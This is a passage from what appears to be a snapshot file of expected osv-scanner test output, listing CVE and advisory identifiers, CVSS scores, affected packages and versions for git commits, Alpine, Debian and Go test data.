https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-15467 | 9.8 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-15468 | 5.9 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-15469 | 5.5 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-4575 | 6.5 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-66199 | 5.9 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-68160 | 4.7 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-69418 | 4.0 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-69419 | 7.4 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-69420 | 7.5 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-9230 | 7.5 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-9231 | 6.5 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-9232 | 5.9 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2026-22795 | 5.5 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2026-22796 | 5.3 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2026-2673 | | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2016-10931 | 8.1 | GIT | https://github.com/sfackler/rust-openssl@0f428d19 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2018-20997 | 9.8 | GIT | https://github.com/sfackler/rust-openssl@0f428d19 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2023-53159 | 9.1 | GIT | https://github.com/sfackler/rust-openssl@0f428d19 | -- | testdata/locks-git/osv-scanner.json | +--------------------------------+------+-----------+---------------------------------------------------------+---------------+-------------------------------------+ --- [TestCommand_CommitSupport/offline_uses_git_tags - 2] --- [TestCommand_CommitSupport/online_uses_git_commits - 1] Scanned /testdata/locks-git/osv-scanner.json file and found 11 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 11 packages affected by 56 known vulnerabilities (7 Critical, 12 High, 23 Medium, 7 Low, 7 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +--------------------------------+------+-----------+----------------------------+-----------------------------+---------------+-------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------------+------+-----------+----------------------------+-----------------------------+---------------+-------------------------------------+ | https://osv.dev/OSV-2018-389 | | GIT | git://github.com/boostorg/boost@1a9dda41 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/OSV-2018-389 | | GIT | github.com/boostorg/boost@1a9dda41 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/OSV-2018-389 | | GIT | http://github.com/boostorg/boost@1a9dda41 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2023-44398 | 8.8 | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/PYSEC-2023-233 | | | | | | | https://osv.dev/CVE-2024-24826 | 5.5 | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2024-25112 | 5.5 | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2024-39695 | 5.3 | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-26623 | 5.3 | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-54080 | 1.8 | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-55304 | 1.8 | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2026-25884 | 2.7 | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2026-27596 | 2.7 | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2026-27631 | 2.7 | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/OSV-2023-1161 | | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/OSV-2024-340 | | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2021-22569 | 5.5 | GIT | https://github.com/apache/orc@17b30e96 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2022-1941 | 7.5 | GIT | https://github.com/apache/orc@17b30e96 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2022-3171 | 7.5 | GIT | https://github.com/apache/orc@17b30e96 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2022-3509 | 7.5 | GIT | https://github.com/apache/orc@17b30e96 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2022-3510 | 7.5 | GIT | https://github.com/apache/orc@17b30e96 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2024-2410 | 9.8 | GIT | https://github.com/apache/orc@17b30e96 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2024-7254 | 7.5 | GIT | https://github.com/apache/orc@17b30e96 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/OSV-2018-389 | | GIT | https://github.com/boostorg/boost@1a9dda41 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2024-51757 | 9.3 | GIT | https://github.com/capricorn86/happy-dom.git@f8221103 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-61927 | 7.2 | GIT | https://github.com/capricorn86/happy-dom.git@f8221103 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-62410 | 9.4 | GIT | https://github.com/capricorn86/happy-dom.git@f8221103 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2024-12797 | 6.3 | GIT | https://github.com/openssl/openssl@45fda76b | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2024-13176 | 4.1 | GIT | https://github.com/openssl/openssl@45fda76b | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2024-9143 | 4.3 | GIT | https://github.com/openssl/openssl@45fda76b | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-9230 | 7.5 | GIT | https://github.com/openssl/openssl@45fda76b | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-9231 | 6.5 | GIT | https://github.com/openssl/openssl@45fda76b | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-9232 | 5.9 | GIT | https://github.com/openssl/openssl@45fda76b | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-11187 | 6.1 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-15467 | 9.8 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-15468 | 5.9 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-15469 | 5.5 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-66199 | 5.9 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-68160 | 4.7 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-69418 | 4.0 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-69419 | 7.4 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-69420 | 7.5 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-9230 | 7.5 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-9231 | 6.5 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-9232 | 5.9 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2026-22795 | 5.5 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2026-22796 | 5.3 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2026-2673 | | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2023-53159 | 9.1 | GIT | https://github.com/sfackler-fork/rust-openssl@3b064fdb | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2023-6180 | 5.3 | GIT | https://github.com/sfackler-fork/rust-openssl@3b064fdb | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-24898 | 6.3 | GIT | https://github.com/sfackler-fork/rust-openssl@3b064fdb | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-3416 | 3.7 | GIT | https://github.com/sfackler-fork/rust-openssl@3b064fdb | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2016-10931 | 8.1 | GIT | https://github.com/sfackler/rust-openssl@0f428d19 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2018-20997 | 9.8 | GIT | https://github.com/sfackler/rust-openssl@0f428d19 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2023-53159 | 9.1 | GIT | https://github.com/sfackler/rust-openssl@0f428d19 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2023-6180 | 5.3 | GIT | https://github.com/sfackler/rust-openssl@0f428d19 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-3416 | 3.7 | GIT | https://github.com/sfackler/rust-openssl@0f428d19 | -- | testdata/locks-git/osv-scanner.json | +--------------------------------+------+-----------+----------------------------------------------------------+---------------+-------------------------------------+ --- [TestCommand_CommitSupport/online_uses_git_commits - 2] --- [TestCommand_Config_UnusedIgnores/unused_ignores_are_reported_with_specific_config_and_file - 1] Scanning dir testdata/sbom-insecure/alpine.cdx.xml Scanned /testdata/sbom-insecure/alpine.cdx.xml file and found 15 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 1 local/unscannable package/s from the scan. CVE-2025-26519 and 1 alias have been filtered out because: (no reason given) CVE-2018-25032 and 1 alias have been filtered out because: (no reason given) Filtered 2 vulnerabilities from output testdata/osv-scanner-partial-ignores-config.toml has unused ignores: - GO-2022-0274 - CVE-2019-5188 - CVE-2022-1304 Total 1 package affected by 3 known vulnerabilities (1 Critical, 1 High, 1 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ --- [TestCommand_Config_UnusedIgnores/unused_ignores_are_reported_with_specific_config_and_file - 2] --- [TestCommand_Config_UnusedIgnores/unused_ignores_are_reported_with_specific_config_and_file#01 - 1] Scanning dir testdata/sbom-insecure Scanned /testdata/sbom-insecure/alpine-zlib-16.cdx.json file and found 1 package Scanned /testdata/sbom-insecure/alpine.cdx.xml file and found 15 packages Scanned /testdata/sbom-insecure/bad-purls.cdx.xml file and found 15 packages Scanned /testdata/sbom-insecure/only-unimportant.spdx.json file and found 1 package Scanned /testdata/sbom-insecure/postgres-stretch.cdx.xml file and found 136 packages Scanned /testdata/sbom-insecure/with-duplicates.cdx.xml file and found 17 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 10 local/unscannable package/s from the scan. CVE-2025-26519 and 1 alias have been filtered out because: (no reason given) CVE-2018-25032 and 1 alias have been filtered out because: (no reason given) CVE-2022-1304 and 2 aliases have been filtered out because: (no reason given) GO-2022-0274 and 2 aliases have been filtered out because: (no reason given) CVE-2025-26519 and 1 alias have been filtered out because: (no reason given) CVE-2018-25032 and 1 alias have been filtered out because: (no reason given) Filtered 8 vulnerabilities from output testdata/osv-scanner-partial-ignores-config.toml has unused ignores: - CVE-2019-5188 Total 24 packages affected by 175 known vulnerabilities (21 Critical, 72 High, 55 Medium, 3 Low, 24 Unknown) from 4 ecosystems. 10 vulnerabilities can be fixed. +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+---------------------------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+---------------------------------------------------------------------+ | https://osv.dev/GO-2022-0452 | 5.9 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.2 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-f3fp-gc8g-vw66 | | | | | | | | https://osv.dev/GO-2023-1627 | 7.0 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-vpvm-3wq2-2wvm | | | | | | | | https://osv.dev/GO-2023-1682 | 2.5 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-m8cg-xc2p-r3fc | | | | | | | | https://osv.dev/GO-2023-1683 | 6.1 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-g2j6-57v7-gm8c | | | | | | | | https://osv.dev/GO-2024-2491 | 8.6 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.12 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-xr7r-f8xq-vfvv | | | | | | | | https://osv.dev/GO-2024-3110 | 4.8 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.14 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-jfvp-7x6p-h2pv | | | | | | | | https://osv.dev/GO-2025-4096 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-9493-h29p-rfm2 | | | | | | | | https://osv.dev/GO-2025-4097 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-qw9x-cqr3-wc7r | | | | | | | | https://osv.dev/GO-2025-4098 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-cgrx-mc8f-2prm | | | | | | | | https://osv.dev/GO-2022-0493 | 5.3 | Go | golang.org/x/sys | v0.0.0-20210817142637-7d9622a276b7 | 0.0.0-20220412211240-33da011f77ad | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-p782-xgp4-8hr8 | | | | | | | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.12-r1 | -- | testdata/sbom-insecure/alpine-zlib-16.cdx.json:lib/apk/db/installed | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.12-r1 | -- | testdata/sbom-insecure/alpine-zlib-16.cdx.json:lib/apk/db/installed | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.12-r1 | -- | testdata/sbom-insecure/alpine-zlib-16.cdx.json:lib/apk/db/installed | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/DSA-4685-1 | 5.5 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4808-1 | 5.7 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0501 | 5.9 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-3462 | 8.1 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3715 | 7.8 | Debian | bash | 4.4-5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-2781 | 6.5 | Debian | coreutils | 8.26-3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-0684 | 5.5 | Debian | coreutils | 8.26-3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3482-1 | | Debian | debian-archive-keyring | 2017.5+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5147-1 | 9.8 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-6297 | 8.2 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-2219 | 7.5 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4535-1 | 7.5 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-5188 | 6.7 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5122-1 | 8.8 | Debian | gzip | 1.6-5+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-0379 | 7.5 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7526 | 6.8 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0495 | 4.7 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-13627 | 6.3 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-33560 | 7.5 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-40528 | 5.9 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5863-1 | 5.3 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-10790 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6003 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-46848 | 9.1 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3263-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2025-13151 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5142-1 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5271-1 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5391-1 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5990-1 | | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-3709 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-2309 | | | | | | | | https://osv.dev/DLA-3878-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2016-9318 | 5.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-0663 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-15412 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-16931 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-16932 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-18258 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-5130 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-5969 | 4.7 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7375 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7376 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-8872 | 9.1 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9047 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9048 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9049 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9050 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-14404 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-14567 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-19956 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-20388 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-7595 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3516 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3517 | 8.6 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3518 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3537 | 5.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3541 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-23308 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-9714 | 5.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4319-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2026-0989 | 3.7 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | 